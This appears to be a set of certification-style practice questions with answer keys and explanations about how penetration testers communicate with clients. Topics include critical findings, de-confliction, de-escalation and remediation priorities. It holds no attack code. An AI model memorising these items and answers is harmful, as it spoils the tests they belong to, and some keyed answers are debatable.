You are a penetration tester, and you are conducting a test for a new client. During the course of a penetration test, you need to communicate with a client. Which of the following situations would cause this communication to occur? (Choose two.)

A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.
C.The system shows a lack of complete hardening.
D.The tester discovered individually identifiable data on the system.
E.The tester discovers something that is on an out-of-scope system.

A

A.Following an attempted test, the system becomes unavailable.
B.The system shows an indication of prior unauthorized access.

Explanation:
These are situations that call for immediate communication with the client. Common penetration testing communication triggers are the completion of a testing phase, the discovery of a critical finding, and the discovery of indicators of a previous compromise. In this scenario, you would want to contact the client if the system becomes unavailable following an attempted test and if the system shows an indication of prior unauthorized access.

75
Q

You are a penetration tester, and you have just completed testing for a new client. Your report to the client lists a total of nine vulnerabilities, with four of those determined to be critical. The client does not have the budget to immediately correct all the vulnerabilities. What should you suggest is the best option for the client given these circumstances?

A.That they apply easy compensating controls for the critical vulnerabilities to minimize risk, and then reprioritize remediation
B.That they identify the vulnerabilities that can be remediated quickest and address them first
C.That they implement the least impactful of the critical vulnerability remediation first and then address other critical vulnerabilities
D.That they correct the most critical vulnerability first, even if it means fixing the other vulnerabilities may take longer to correct

A

D.That they correct the most critical vulnerability first, even if it means fixing the other vulnerabilities may take longer to correct

Explanation:

In this scenario, the client does not have the budget to immediately correct all the vulnerabilities found. In this case, the best suggestion to tell the client is to correct the most critical vulnerability first and, then when funds become available, fix the other critical vulnerabilities.

76
Q

You are a penetration tester, and you are conducting a test for a new client. During the testing of the client’s core server, you discover a critical vulnerability. What should you do next?

A.Finish testing, complete all findings, and then submit them to the client.
B.Immediately alert the client with details of the findings.
C.On the target machine, disable the network port of the affected service.
D.Take the target machine offline so it cannot be exploited.

A

B.Immediately alert the client with details of the findings

Explanation:
In this scenario, since the penetration tester discovered a critical vulnerability, the tester should immediately alert the client with the details of the findings.

77
Q

Your company has been asked to perform a physical security assessment. However, during the test, an individual is caught piggybacking into the client’s facility. The individual claims that he is a penetration tester and insists on being set free. Prior to pressing any criminal charges for trespassing, a member of the client’s IT department calls your office to determine whether the trespasser is really a member of the penetration testing team. What is this type of communication path called?

A.De-confliction
B.De-escalation
C.Goal reprioritization
D.Situational awareness

A

A.De-confliction

Explanation:
De-confliction refers to the communication between the client and the tester to determine whether the detected attacker is actually part of the physical security assessment. It may sometimes be necessary to create a “get out of jail free” card, which has emergency off-hours phone numbers of higher-ranking officers within the company who are aware of the test and can confirm that the tester has the authority to conduct the tests requested.

78
Q

You are a penetration tester, and you are conducting a test for a new client. During testing, the client begins to receive customer complaints stating that the website is slow to respond or crashes. The client’s network administrator discovers that a distributed denial of service (DDoS) attack is currently taking place aimed at the company’s web server. Sales are starting to be lost, so the network administrator contacts you and asks you to stop the DDoS attack. What is this communication path called?

A.De-confliction
B.De-escalation
C.Goal reprioritization
D.Situational awareness

A

B.De-escalation

Explanation:
The term de-escalation refers to the process of communication between the client and the tester to stop any exploitation being used during the penetration test because of the effects it may be having on the client’s network. In this scenario, the client was losing sales because of the website issues, so the testing needed to be stopped.

79
Q

You are a penetration tester, and you are planning on conducting a black box penetration test for a new client. You have completed the reconnaissance phase of the test and are now ready to move on to the next phase of testing. However, before doing so, you contact the client and inform them that testing is moving forward. What type of communication trigger is being used?

A.Critical findings
B.Communication path
C.Situational awareness
D.Stages

A

D.Stages

Explanation:
In this scenario, the tester has completed one phase of testing and is ready to move on to the next phase. This is called stages. Upon completion of a testing stage, the tester should contact the client, inform them that the stage is complete, and then proceed to the next stage of testing.

80
Q

You are a penetration tester, and you are conducting a gray box penetration test for a new client. During testing, you discover that many of the client’s Windows desktop systems haven’t been updated and are vulnerable to attacks. Instead of waiting until the end of testing, you contact your client to warn them that their systems need to be updated to prevent any unwanted attacks. What type of communication trigger is being used?

A.Critical findings
B.Communication path
C.Situational awareness
D.Stages

A

A.Critical findings

Explanation:
If the penetration tester finds a critical issue with the security of their client’s environment, they should not wait for the delivery of their final report. By leaving a critical vulnerability unaddressed, it may put the client at an unacceptable level of risk and result in a potential compromise. The tester should immediately notify management of the issue.